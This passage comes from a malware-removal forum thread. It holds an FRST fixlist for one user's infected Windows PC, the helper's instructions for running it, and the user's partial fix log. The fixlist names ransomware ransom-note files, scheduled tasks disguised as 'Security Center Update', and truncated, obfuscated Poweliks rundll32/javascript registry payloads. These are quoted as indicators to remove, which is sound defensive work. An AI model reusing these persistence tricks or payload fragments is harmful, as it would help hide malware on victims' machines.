2015-02-19 22:11 - 2014-11-07 11:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\{30112b75-e574-a6db-560c-8103291a0838}
2015-02-19 21:07 - 2014-12-03 17:38 - 00000000 ____D () C:\ProgramData\PenulErhig
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kuseyd
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Guhyanmo
2015-02-19 07:40 - 2015-01-06 13:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Veepme
2015-02-19 07:40 - 2015-01-05 20:36 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kybeuv
2015-02-19 07:40 - 2015-01-05 15:02 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wiudiz
2015-02-19 07:40 - 2015-01-02 12:19 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tapyara
2015-02-19 07:40 - 2014-12-26 17:52 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Rifiewyn
2015-02-19 07:40 - 2014-12-25 17:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ynopqual
2015-02-19 07:40 - 2014-12-25 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ihywkead
2015-02-19 07:40 - 2014-12-25 15:43 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ekmiys
2015-02-19 07:40 - 2014-12-23 15:28 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Maypyz
2015-02-19 07:40 - 2014-12-22 15:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fuwutee
2015-02-19 07:40 - 2014-12-22 14:56 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fyarxy
2015-02-19 07:40 - 2014-12-21 15:20 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zekubuab
2015-02-19 07:40 - 2014-12-15 16:15 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wuwuec
2015-02-19 07:40 - 2014-12-14 15:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Byloaq
2015-02-19 07:40 - 2014-12-12 15:35 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Yhohybe
2015-02-19 07:40 - 2014-12-11 21:23 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hovoote
2015-02-19 07:40 - 2014-12-11 16:09 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Amcyocut
2015-02-19 07:40 - 2014-12-11 09:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itsefo
2015-02-19 07:40 - 2014-12-08 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tumiexcu
2015-02-19 07:40 - 2014-12-08 16:37 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ziqeexew
2015-02-19 07:40 - 2014-12-04 15:16 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Mawywopo
2015-02-19 07:40 - 2014-12-03 17:42 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Icxeewhu
2015-02-19 07:40 - 2014-12-03 13:46 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ucucni
2015-02-19 07:40 - 2014-12-02 18:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Edutsoix
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ruyxku
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Huqokayx
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\TifwIdyo
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\BolsiWelug
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\PeboZnoli
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\CecuSefki
2015-02-19 07:40 - 2014-11-24 20:33 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itufefv
2015-02-19 07:40 - 2014-11-24 20:28 - 00000000 ____D () C:\ProgramData\FapziGguzq
2015-02-19 07:40 - 2014-11-23 15:14 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Senyzayr
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\QiktiWuffu
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\FadyOdyu
2015-02-19 07:40 - 2014-11-23 08:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zacosia
2015-02-19 07:40 - 2014-11-23 08:53 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ecqootfi
2015-02-19 07:40 - 2014-11-23 08:43 - 00000000 ____D () C:\ProgramData\TixoZuwu
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ymqiuky
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Qaedxa
2015-02-19 07:40 - 2014-11-20 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hyipfy
2015-02-19 07:40 - 2014-11-20 15:49 - 00000000 ____D () C:\ProgramData\EiniHubex
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Woakduwa
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Obmukany
2015-02-19 07:40 - 2014-11-19 16:03 - 00000000 ____D () C:\ProgramData\GuxeXowi
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Gynika
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Egewtoi
2015-02-19 07:40 - 2014-11-18 15:26 - 00000000 ____D () C:\ProgramData\MokeVike
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Pevyliu
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ciokov
2015-02-19 07:40 - 2014-11-17 19:07 - 00000000 ____D () C:\ProgramData\MesmAyof
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ohvyev
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Esisgyl
2015-02-19 07:40 - 2014-11-17 10:05 - 00000000 ____D () C:\ProgramData\LuqePana
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\YuctAren
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\GiqyoCxuko
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JoheMsum
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JahebSuhvo
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\HozbEzpud
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\FasuTuhu
2015-02-19 07:40 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ytbynede
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\NeheQiri
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\KaseJolmi
2015-02-19 07:40 - 2014-11-13 18:25 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezrydu
2015-02-19 07:40 - 2014-11-13 18:21 - 00000000 ____D () C:\ProgramData\UardiNdeca
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Sequefb
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Onpyym
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\UopiJowv
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\DervUvon
2015-02-19 07:40 - 2014-11-12 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\PokuGehos
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\NerxElyo
2015-02-19 07:40 - 2014-11-11 20:48 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Upvukyy
2015-02-19 07:40 - 2014-11-11 20:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Olaqduqo
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\PapoSutul
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\MoruYemq
2015-02-19 07:40 - 2014-11-11 18:14 - 00000000 ____D () C:\ProgramData\JufhEnusi
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\YansAjfir
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\KitpUxijo
2015-02-19 07:40 - 2014-11-07 17:00 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Ugmedia
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\XiceNnar
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\TobaFisa
2015-02-19 07:40 - 2014-10-02 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\tmp1461
2015-02-01 20:32 - 2014-11-10 16:30 - 00000648 _____ () C:\ProgramData\@system.temp
2015-02-01 20:32 - 2014-11-10 16:30 - 00000384 ____H () C:\ProgramData\@system3.att
2014-11-13 18:51 - 2015-01-07 09:58 - 0000288 _____ () C:\Users\Dorothy01\AppData\Roaming\1B477081.reg
2014-11-21 18:59 - 2014-11-21 18:59 - 0022327 _____ () C:\Users\Dorothy01\AppData\Roaming\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2015-01-12 15:11 - 2015-01-12 15:11 - 0008562 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-12 15:11 - 2015-01-12 15:11 - 0001270 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-12 15:11 - 2015-01-12 15:11 - 0004224 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.TXT
2014-11-10 16:30 - 2014-11-10 16:30 - 0000448 ____H () C:\Users\Dorothy01\AppData\Roaming\????
2014-11-21 18:59 - 2014-11-21 18:59 - 0037439 _____ () C:\Users\Dorothy01\AppData\Local\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-12-11 09:44 - 2014-12-11 21:24 - 0929536 _____ () C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat
2015-01-12 15:10 - 2015-01-12 15:10 - 0008562 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML
2015-01-12 15:10 - 2015-01-12 15:10 - 0001270 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG
2015-01-12 15:10 - 2015-01-12 15:10 - 0004224 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.TXT
2015-02-19 21:07 - 2015-02-19 21:07 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-21 03:30 - 2015-02-21 03:30 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pgkunge.dll
2014-11-21 18:59 - 2014-11-21 18:59 - 0026477 _____ () C:\ProgramData\893686b8
2014-11-10 16:30 - 2015-02-01 20:32 - 0000648 _____ () C:\ProgramData\@system.temp
2014-11-10 16:30 - 2015-02-01 20:32 - 0000384 ____H () C:\ProgramData\@system3.att
2015-01-12 15:09 - 2015-01-12 15:09 - 0008562 _____ () C:\ProgramData\HELP_DECRYPT.HTML
2015-01-12 15:09 - 2015-01-12 15:09 - 0001270 _____ () C:\ProgramData\HELP_DECRYPT.PNG
2015-01-12 15:09 - 2015-01-12 15:09 - 0004224 _____ () C:\ProgramData\HELP_DECRYPT.TXT
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ARS.exe
C:\Users\Dorothy01\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ivbhim.exe
C:\Users\Dorothy01\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Dorothy01\AppData\Local\Temp\sqlite3.dll
C:\Users\Dorothy01\AppData\Local\Temp\tmp7A9C.tmp.exe
Task: {0AF68A16-8BB9-4884-9B4E-15D4F360BB7B} - System32\Tasks\Security Center Update - 2036164130 => C:\Users\Dorothy01\AppData\Roaming\Yhohybe\odhie.exe <==== ATTENTION
Task: {0C23B36F-F62C-434F-AA02-5ADBADF1858B} - System32\Tasks\Security Center Update - 2231539794 => C:\Users\Dorothy01\AppData\Roaming\Qaedxa\uwywweo.exe <==== ATTENTION
Task: {14653784-6568-4765-B81E-19CEB2C29EEF} - System32\Tasks\Security Center Update - 304447838 => C:\Users\Dorothy01\AppData\Roaming\Fyarxy\odrakal.exe <==== ATTENTION
Task: {1DE689D1-D5D6-4E99-9906-A33502FF48FF} - System32\Tasks\Security Center Update - 3156874879 => C:\Users\Dorothy01\AppData\Roaming\Ziqeexew\peisomr.exe <==== ATTENTION
Task: {29FD53A0-B0E0-4AC5-A535-A77BDBAB7300} - System32\Tasks\Security Center Update - 1511213846 => C:\Users\Dorothy01\AppData\Roaming\Ynopqual\epeht.exe <==== ATTENTION
Task: {34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87} - System32\Tasks\Security Center Update - 3665910781 => C:\Users\Dorothy01\AppData\Roaming\Ekmiys\edanuzh.exe <==== ATTENTION
Task: {38AD3EE9-89B1-4FE8-BD3A-C268041E30AB} - System32\Tasks\Security Center Update - 3379427597 => C:\Users\Dorothy01\AppData\Roaming\Obmukany\otipky.exe <==== ATTENTION
Task: {46591690-E2C7-4AB5-90B8-0807BF83FA2E} - System32\Tasks\Security Center Update - 1219234967 => C:\Users\Dorothy01\AppData\Roaming\Hovoote\viywyke.exe <==== ATTENTION
Task: {4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC} - System32\Tasks\Security Center Update - 951185298 => C:\Users\Dorothy01\AppData\Roaming\Tumiexcu\esinwii.exe <==== ATTENTION
Task: {506490F7-3376-4EFC-A901-586AA3303B44} - System32\Tasks\Security Center Update - 2325803103 => C:\Users\Dorothy01\AppData\Roaming\Adhoxi\vywipir.exe <==== ATTENTION
Task: {516E887F-D9AA-43E6-A51E-2905BC435DC3} - System32\Tasks\Security Center Update - 1528112639 => C:\Users\Dorothy01\AppData\Roaming\Kuseyd\ihnoxa.exe <==== ATTENTION
Task: {58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A} - System32\Tasks\Security Center Update - 2901739987 => C:\Users\Dorothy01\AppData\Roaming\Icxeewhu\avazx.exe <==== ATTENTION
Task: {62015E40-868F-450C-BB00-4F2987356F87} - System32\Tasks\Security Center Update - 3903236305 => C:\Users\Dorothy01\AppData\Roaming\Itufefv\qusieny.exe <==== ATTENTION
Task: {636CB7B6-8835-4A64-A923-ED55EB0D8640} - System32\Tasks\Security Center Update - 2512843633 => C:\Users\Dorothy01\AppData\Roaming\Ohvyev\yketpyu.exe <==== ATTENTION
Task: {6378A9C8-1406-4725-9242-44BFD048B5CE} - System32\Tasks\Security Center Update - 331106455 => C:\Users\Dorothy01\AppData\Roaming\Ymqiuky\mipiims.exe <==== ATTENTION
Task: {639A2A23-A522-40F7-AD5D-9F1245DF1A82} - System32\Tasks\Security Center Update - 2487970780 => C:\Users\Dorothy01\AppData\Roaming\Pevyliu\adelre.exe <==== ATTENTION
Task: {6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7} - System32\Tasks\rspahma => C:\Users\DOROTH~1\AppData\Local\Temp\utyczdi.exe <==== ATTENTION
Task: {70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54} - System32\Tasks\Security Center Update - 3838766864 => C:\Users\Dorothy01\AppData\Roaming\Ezrydu\xyelefq.exe <==== ATTENTION
Task: {72165FBF-954D-4040-B5B5-BC5F9EED3A0E} - System32\Tasks\Security Center Update - 3216473386 => C:\Users\Dorothy01\AppData\Roaming\Zacosia\geulby.exe <==== ATTENTION
Task: {7430F638-B12A-445A-BBEF-5E8F514DF753} - System32\Tasks\Security Center Update - 699896687 => C:\Users\Dorothy01\AppData\Roaming\Itsefo\zyyzpii.exe <==== ATTENTION
Task: {7444E2A1-12CB-40A5-B56A-3E21543B4514} - System32\Tasks\Security Center Update - 3204526539 => C:\Users\Dorothy01\AppData\Roaming\Huqokayx\cazol.exe <==== ATTENTION
Task: {797B7B84-6E57-4129-A6A9-7A7099782A48} - System32\Tasks\Security Center Update - 242654636 => C:\Users\Dorothy01\AppData\Roaming\Maypyz\acoxv.exe <==== ATTENTION
Task: {7BB4C936-AFE9-405B-8288-876487348757} - System32\Tasks\Security Center Update - 116467704 => C:\Users\Dorothy01\AppData\Roaming\Zekubuab\usloe.exe <==== ATTENTION
Task: {7E32FCE3-C859-49A2-8E75-598B56230006} - System32\Tasks\Security Center Update - 4028262528 => C:\Users\Dorothy01\AppData\Roaming\Byloaq\uzodzay.exe <==== ATTENTION
Task: {833517E7-60C9-4EBA-B5E2-E1A24D86CE1A} - System32\Tasks\Security Center Update - 2519066445 => C:\Users\Dorothy01\AppData\Roaming\Ruyxku\vyfyr.exe <==== ATTENTION
Task: {86BAB3C1-BEB4-4F5B-9723-D319FC15EB44} - System32\Tasks\Security Center Update - 1810362612 => C:\Users\Dorothy01\AppData\Roaming\Senyzayr\ynval.exe <==== ATTENTION
Task: {8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832} - System32\Tasks\Security Center Update - 3747167081 => C:\Users\Dorothy01\AppData\Roaming\Kybeuv\zywefu.exe <==== ATTENTION
Task: {91474FF9-C8FF-4F7E-B671-C5BAA856571C} - System32\Tasks\Security Center Update - 513270047 => C:\Users\Dorothy01\AppData\Roaming\Veepme\mearabi.exe <==== ATTENTION
Task: {9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF} - System32\Tasks\Security Center Update - 4149247359 => C:\Users\Dorothy01\AppData\Roaming\Tapyara\ehubzy.exe <==== ATTENTION
Task: {9BD8C08F-7F0B-430E-AD7D-12988F4D4D76} - System32\Tasks\Security Center Update - 1179286971 => C:\Users\Dorothy01\AppData\Roaming\Ciokov\ekypu.exe <==== ATTENTION
Task: {9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3} - System32\Tasks\Security Center Update - 1285267939 => C:\Users\Dorothy01\AppData\Roaming\Ytbynede\ebusfe.exe <==== ATTENTION
Task: {9DB27102-BD01-4DBA-AA72-192BAC09BFE7} - System32\Tasks\Security Center Update - 3201999599 => C:\Users\Dorothy01\AppData\Roaming\Ihywkead\olypozo.exe <==== ATTENTION
Task: {A24B621A-54AB-4FAF-9C35-FB0D87321DD4} - System32\Tasks\Security Center Update - 1259602875 => C:\Users\Dorothy01\AppData\Roaming\Egewtoi\kumysio.exe <==== ATTENTION
Task: {A31D10D4-B4CF-4475-B02B-0A9BEB4E6617} - System32\Tasks\Security Center Update - 2329648882 => C:\Users\Dorothy01\AppData\Roaming\Ecqootfi\inecimy.exe <==== ATTENTION
Task: {A3FB09EC-C469-45ED-8A04-7E9497A4358B} - System32\Tasks\Security Center Update - 532629427 => C:\Users\Dorothy01\AppData\Roaming\Mawywopo\yhrog.exe <==== ATTENTION
Task: {ACE571AA-4750-4BA4-9AB7-285B651F13E4} - System32\Tasks\Security Center Update - 578871115 => C:\Users\Dorothy01\AppData\Roaming\Wiudiz\areta.exe <==== ATTENTION
Task: {B1AE1850-9814-4733-A837-1BCFDCA93C2F} - System32\Tasks\Security Center Update - 1433702555 => C:\Users\Dorothy01\AppData\Roaming\Olaqduqo\oxico.exe <==== ATTENTION
Task: {B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2} - System32\Tasks\Security Center Update - 2786531556 => C:\Users\Dorothy01\AppData\Roaming\Guhyanmo\usukrau.exe <==== ATTENTION
Task: {B31AB263-6E64-4AE6-9131-F03F3EB11C96} - System32\Tasks\Security Center Update - 2649167008 => C:\Users\Dorothy01\AppData\Roaming\Amcyocut\seovado.exe <==== ATTENTION
Task: {B69D26CC-F736-43EF-8678-4047B1182B5E} - System32\Tasks\Security Center Update - 4109173847 => C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf\ziexepo.exe <==== ATTENTION
Task: {BA2069FF-78E4-45BC-B55E-CD0ACD43F066} - System32\Tasks\Security Center Update - 2002689914 => C:\Users\Dorothy01\AppData\Roaming\Hyipfy\eheqqu.exe <==== ATTENTION
Task: {BB68D13D-D1D6-492F-8D8C-218D8F32F366} - System32\Tasks\Security Center Update - 3566967998 => C:\Users\Dorothy01\AppData\Roaming\Sequefb\apxuyb.exe <==== ATTENTION
Task: {C0214B00-381D-48C6-8657-2096534B77ED} - System32\Tasks\Security Center Update - 2047020247 => C:\Users\Dorothy01\AppData\Roaming\Woakduwa\vyvefiy.exe <==== ATTENTION
Task: {C8F0BD03-484C-4EA4-B730-E73FCF57C579} - System32\Tasks\Security Center Update - 1058146964 => C:\Users\Dorothy01\AppData\Roaming\Esisgyl\hupoto.exe <==== ATTENTION
Task: {CCE07978-A743-41CE-84CE-1E73B09468DB} - System32\Tasks\Security Center Update - 4056442320 => C:\Users\Dorothy01\AppData\Roaming\Ucucni\qyhyg.exe <==== ATTENTION
Task: {D272D6E1-FF48-4D29-8FED-3859A8299DC8} - System32\Tasks\Security Center Update - 446489216 => C:\Users\Dorothy01\AppData\Roaming\Gynika\daboop.exe <==== ATTENTION
Task: {DAF472B5-87C9-4EB7-BD1F-23897D28E7CF} - System32\Tasks\Security Center Update - 4131681425 => C:\Users\Dorothy01\AppData\Roaming\Upvukyy\qikoiqp.exe <==== ATTENTION
Task: {DD416C59-DA11-4673-95DF-6CCB71853F43} - System32\Tasks\Security Center Update - 2300971329 => C:\Users\Dorothy01\AppData\Roaming\Fuwutee\kikiap.exe <==== ATTENTION
Task: {F0BDD635-04A8-43FD-B541-D9182F90415D} - System32\Tasks\Security Center Update - 4105554909 => C:\Users\Dorothy01\AppData\Roaming\Wuwuec\xeabac.exe <==== ATTENTION
Task: {F9426B1C-C5B8-43C1-9B81-F5F6932587E9} - System32\Tasks\Security Center Update - 700698430 => C:\Users\Dorothy01\AppData\Roaming\Edutsoix\idyzsya.exe <==== ATTENTION
Task: {FA7D302B-25B4-4938-976B-AFD59ED105BC} - System32\Tasks\Security Center Update - 3992158093 => C:\Users\Dorothy01\AppData\Roaming\Onpyym\puzyril.exe <==== ATTENTION
Task: {FDF8C72F-4705-4C83-B0F3-47690D02FCBE} - System32\Tasks\Security Center Update - 4183678770 => C:\Users\Dorothy01\AppData\Roaming\Rifiewyn\puyrdo.exe <==== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-1427692388-1042374531-2795145444-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
Reboot:
end


NOTE. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST64 by right-clicking on the FRST64.exe file and selecting "Run as Administrator". The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.

The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on. Press the Fix button just once and wait. The tool will create a restore point, process the script and ask for a restart of your system.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished, FRST will generate a log on the Desktop (Fixlog.txt). Please post it in your reply.

Information to Reply with >>>>
  • How did the uninstalling of the extra AV go?
  • The Fixlog.txt log file text.
  • How is your system running now?


#6
allforhimblog


Norton had expired, so I downloaded that tool and uninstalled it with no problems. Ran the fixlist (might have messed up b/c I ran it in safe mode instead of normal :( ) and attached is that log. Now I am up and running in normal mode, and Internet Explorer will let me download files now. I've had it up and running without any PowerShell errors as well. But something still seems off: something is continuing to chew at resources and slow it down, and Windows Update will not allow me to check for updates; it says that the service isn't running.

 

Thanks again for all your help!!

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 21-02-2015
Ran by Dorothy01 at 2015-02-24 06:07:45 Run:1
Running from C:\Users\Dorothy01\Desktop
Loaded Profiles: Dorothy01 (Available profiles: Dorothy01)
Boot Mode: Safe Mode (with Networking)
==============================================
 
Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [CrashReportSaver] => C:\WINDOWS\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe [1464320 2015-02-20] (EFD Software)
Winlogon\Notify\pckunie-x32: C:\Users\Dorothy01\AppData\Local\pckunie.dll ()
Winlogon\Notify\pgkunge-x32: C:\Users\Dorothy01\AppData\Local\pgkunge.dll ()
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [acikmao] => rundll32 "C:\Users\Dorothy01\AppData\Local\acikmao.dll",acikmao <===== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\Run: [dccwmote] => C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe [406016 2015-02-21] () <===== ATTENTION
C:\Users\Dorothy01\AppData\Local\acikmao.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\MountPoints2: {5042c0a6-b247-11e4-bed4-089e013a632b} - "G:\AutoRun.exe"
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT ()
InternetURL: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://paytoc4gtpn5czl2.torconnectpaycom/1msme5i
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} -> No File
BHO: No Name -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> No File
BHO-x32: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} -> No File
Toolbar: HKLM - No Name - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - No File
Toolbar: HKU\.DEFAULT -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Tcpip\..\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
